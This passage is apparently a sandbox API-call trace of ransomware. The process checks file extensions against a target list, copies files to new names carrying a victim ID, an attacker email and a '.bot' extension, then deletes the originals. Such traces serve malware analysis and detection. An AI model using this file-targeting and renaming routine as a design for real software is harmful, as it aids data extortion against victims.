	[0047.940] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0047.940] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG") returned 75
	[0047.940] lstrlenW (lpString=".1cd") returned 4
	[0047.940] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0047.940] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG") returned 75
	[0047.940] lstrlenW (lpString=".jpg") returned 4
	[0047.940] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0047.940] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG") returned 75
	[0047.940] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG") returned 75
	[0047.940] lstrlenW (lpString=".doc") returned 4
	[0047.940] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0047.940] lstrlenW (lpString=".docx") returned 5
	[0047.940] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0047.940] lstrlenW (lpString=".pdf") returned 4
	[0047.940] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0047.940] lstrlenW (lpString=".xls") returned 4
	[0047.940] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0047.940] lstrlenW (lpString=".xlsx") returned 5
	[0047.940] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0047.940] lstrlenW (lpString=".ppt") returned 4
	[0047.940] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0047.940] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG") returned 75
	[0047.940] lstrlenW (lpString=".zip") returned 4
	[0047.940] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0047.940] lstrlenW (lpString=".rar") returned 4
	[0047.940] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0047.940] lstrlenW (lpString=".bz2") returned 4
	[0047.941] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0047.941] lstrlenW (lpString=".7z") returned 3
	[0047.941] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0047.941] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG") returned 75
	[0047.941] lstrlenW (lpString=".dbf") returned 4
	[0047.941] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0047.941] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG") returned 75
	[0047.941] lstrlenW (lpString=".1cd") returned 4
	[0047.941] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0047.941] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG") returned 75
	[0047.941] lstrlenW (lpString=".jpg") returned 4
	[0047.941] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0047.941] lstrcmpiW (lpString1=".PNG", lpString2=".bot") returned 1
	[0047.941] lstrlenW (lpString="THMBNAIL.PNG") returned 12
	[0047.941] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0047.942] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0xa69ff1c | out: lpFileSize=0xa69ff1c*=44302) returned 1
	[0047.942] CloseHandle (hObject=0x1a8) returned 1
	[0047.942] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\thmbnail.png")) returned 0x20
	[0047.942] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0047.942] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0047.942] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0047.943] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0047.943] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8
	[0047.943] GetLastError () returned 0x0
	[0047.943] ReadFile (in: hFile=0x1a8, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0xad0e, lpOverlapped=0x0) returned 1
	[0047.945] WriteFile (in: hFile=0x1f8, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0xad10, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0xad10, lpOverlapped=0x0) returned 1
	[0047.946] ReadFile (in: hFile=0x1a8, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x0, lpOverlapped=0x0) returned 1
	[0047.947] WriteFile (in: hFile=0x1f8, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0047.947] SetEndOfFile (hFile=0x1f8) returned 1
	[0047.947] CloseHandle (hObject=0x1f8) returned 1
	[0047.947] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0047.947] SetEndOfFile (hFile=0x1a8) returned 1
	[0047.948] CloseHandle (hObject=0x1a8) returned 1
	[0047.948] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0047.948] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\thmbnail.png")) returned 1
	[0047.948] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG") returned 77
	[0047.948] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG") returned 77
	[0047.948] lstrlenW (lpString=".doc") returned 4
	[0047.948] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0047.948] lstrlenW (lpString=".docx") returned 5
	[0047.949] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0047.949] lstrlenW (lpString=".pdf") returned 4
	[0047.949] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0047.949] lstrlenW (lpString=".xls") returned 4
	[0047.949] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0047.949] lstrlenW (lpString=".xlsx") returned 5
	[0047.949] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0047.949] lstrlenW (lpString=".ppt") returned 4
	[0047.949] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0047.949] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG") returned 77
	[0047.949] lstrlenW (lpString=".zip") returned 4
	[0047.949] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0047.949] lstrlenW (lpString=".rar") returned 4
	[0047.949] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0047.949] lstrlenW (lpString=".bz2") returned 4
	[0047.949] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0047.949] lstrlenW (lpString=".7z") returned 3
	[0047.949] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0047.949] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG") returned 77
	[0047.949] lstrlenW (lpString=".dbf") returned 4
	[0047.949] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0047.949] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG") returned 77
	[0047.949] lstrlenW (lpString=".1cd") returned 4
	[0047.949] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0047.949] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG") returned 77
	[0047.949] lstrlenW (lpString=".jpg") returned 4
	[0047.949] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0047.949] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG") returned 77
	[0047.949] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG") returned 77
	[0047.949] lstrlenW (lpString=".doc") returned 4
	[0047.949] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0047.949] lstrlenW (lpString=".docx") returned 5
	[0047.949] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0047.950] lstrlenW (lpString=".pdf") returned 4
	[0047.950] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0047.950] lstrlenW (lpString=".xls") returned 4
	[0047.950] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0047.950] lstrlenW (lpString=".xlsx") returned 5
	[0047.950] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0047.950] lstrlenW (lpString=".ppt") returned 4
	[0047.950] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0047.950] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG") returned 77
	[0047.950] lstrlenW (lpString=".zip") returned 4
	[0047.950] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0047.950] lstrlenW (lpString=".rar") returned 4
	[0047.950] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0047.950] lstrlenW (lpString=".bz2") returned 4
	[0047.950] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0047.950] lstrlenW (lpString=".7z") returned 3
	[0047.950] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0047.950] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG") returned 77
	[0047.950] lstrlenW (lpString=".dbf") returned 4
	[0047.950] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0047.950] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG") returned 77
	[0047.950] lstrlenW (lpString=".1cd") returned 4
	[0047.950] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0047.950] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG") returned 77
	[0047.950] lstrlenW (lpString=".jpg") returned 4
	[0047.950] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0047.950] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0047.950] lstrlenW (lpString="PREVIEW.GIF") returned 11
	[0047.950] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0047.951] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0xa69ff1c | out: lpFileSize=0xa69ff1c*=2668) returned 1
	[0047.951] CloseHandle (hObject=0x1a8) returned 1
	[0047.951] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\preview.gif")) returned 0x20
	[0047.951] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\preview.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0047.951] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0047.951] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0047.951] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0047.951] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\preview.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8
	[0047.953] GetLastError () returned 0x0
	[0047.953] ReadFile (in: hFile=0x1a8, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0xa6c, lpOverlapped=0x0) returned 1
	[0047.954] WriteFile (in: hFile=0x1f8, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0xa70, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0xa70, lpOverlapped=0x0) returned 1
	[0047.955] ReadFile (in: hFile=0x1a8, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x0, lpOverlapped=0x0) returned 1
	[0047.955] WriteFile (in: hFile=0x1f8, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0xea, lpOverlapped=0x0) returned 1
	[0047.955] SetEndOfFile (hFile=0x1f8) returned 1
	[0047.955] CloseHandle (hObject=0x1f8) returned 1
	[0047.955] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0047.956] SetEndOfFile (hFile=0x1a8) returned 1
	[0047.956] CloseHandle (hObject=0x1a8) returned 1
	[0047.956] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0047.956] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\preview.gif")) returned 1
	[0047.957] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF") returned 73
	[0047.957] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF") returned 73
	[0047.957] lstrlenW (lpString=".doc") returned 4
	[0047.957] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0047.957] lstrlenW (lpString=".docx") returned 5
	[0047.957] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0047.957] lstrlenW (lpString=".pdf") returned 4
	[0047.957] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0047.957] lstrlenW (lpString=".xls") returned 4
	[0047.957] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0047.957] lstrlenW (lpString=".xlsx") returned 5
	[0047.957] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0047.957] lstrlenW (lpString=".ppt") returned 4
	[0047.957] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0047.957] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF") returned 73
	[0047.957] lstrlenW (lpString=".zip") returned 4
	[0047.957] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0047.957] lstrlenW (lpString=".rar") returned 4
	[0047.957] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0047.957] lstrlenW (lpString=".bz2") returned 4
	[0047.957] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0047.957] lstrlenW (lpString=".7z") returned 3
	[0047.957] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0047.957] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF") returned 73
	[0047.957] lstrlenW (lpString=".dbf") returned 4
	[0047.957] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0047.957] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF") returned 73
	[0047.957] lstrlenW (lpString=".1cd") returned 4
	[0047.958] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0047.958] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF") returned 73
	[0047.958] lstrlenW (lpString=".jpg") returned 4
	[0047.958] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0047.958] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF") returned 73
	[0047.958] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF") returned 73
	[0047.958] lstrlenW (lpString=".doc") returned 4
	[0047.958] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0047.958] lstrlenW (lpString=".docx") returned 5
	[0047.958] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0047.958] lstrlenW (lpString=".pdf") returned 4
	[0047.958] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0047.958] lstrlenW (lpString=".xls") returned 4
	[0047.958] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0047.958] lstrlenW (lpString=".xlsx") returned 5
	[0047.958] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0047.958] lstrlenW (lpString=".ppt") returned 4
	[0047.958] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0047.958] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF") returned 73
	[0047.958] lstrlenW (lpString=".zip") returned 4
	[0047.958] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0047.958] lstrlenW (lpString=".rar") returned 4
	[0047.958] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0047.958] lstrlenW (lpString=".bz2") returned 4
	[0047.958] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0047.958] lstrlenW (lpString=".7z") returned 3
	[0047.958] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0047.958] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF") returned 73
	[0047.958] lstrlenW (lpString=".dbf") returned 4
	[0047.958] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0047.958] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF") returned 73
	[0047.958] lstrlenW (lpString=".1cd") returned 4
	[0047.958] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0047.958] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF") returned 73
	[0047.959] lstrlenW (lpString=".jpg") returned 4
	[0047.959] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0047.959] lstrcmpiW (lpString1=".PNG", lpString2=".bot") returned 1
	[0047.959] lstrlenW (lpString="THMBNAIL.PNG") returned 12
	[0047.959] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0047.959] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0xa69ff1c | out: lpFileSize=0xa69ff1c*=42453) returned 1
	[0047.959] CloseHandle (hObject=0x1a8) returned 1
	[0047.959] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\thmbnail.png")) returned 0x20
	[0047.959] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0047.959] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0047.959] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0047.959] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0047.959] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8
	[0047.960] GetLastError () returned 0x0
	[0047.960] ReadFile (in: hFile=0x1a8, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0xa5d5, lpOverlapped=0x0) returned 1
	[0047.962] WriteFile (in: hFile=0x1f8, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0xa5e0, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0xa5e0, lpOverlapped=0x0) returned 1
	[0047.963] ReadFile (in: hFile=0x1a8, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x0, lpOverlapped=0x0) returned 1
	[0047.963] WriteFile (in: hFile=0x1f8, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0047.963] SetEndOfFile (hFile=0x1f8) returned 1
	[0047.964] CloseHandle (hObject=0x1f8) returned 1
	[0047.964] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0047.964] SetEndOfFile (hFile=0x1a8) returned 1
	[0047.965] CloseHandle (hObject=0x1a8) returned 1
	[0047.965] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0047.965] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\thmbnail.png")) returned 1
	[0047.965] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG") returned 74
	[0047.965] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG") returned 74
	[0047.965] lstrlenW (lpString=".doc") returned 4
	[0047.965] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0047.965] lstrlenW (lpString=".docx") returned 5
	[0047.965] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0047.965] lstrlenW (lpString=".pdf") returned 4
	[0047.965] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0047.965] lstrlenW (lpString=".xls") returned 4
	[0047.965] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0047.965] lstrlenW (lpString=".xlsx") returned 5
	[0047.965] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0047.965] lstrlenW (lpString=".ppt") returned 4
	[0047.965] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0047.965] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG") returned 74
	[0047.966] lstrlenW (lpString=".zip") returned 4
	[0047.966] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
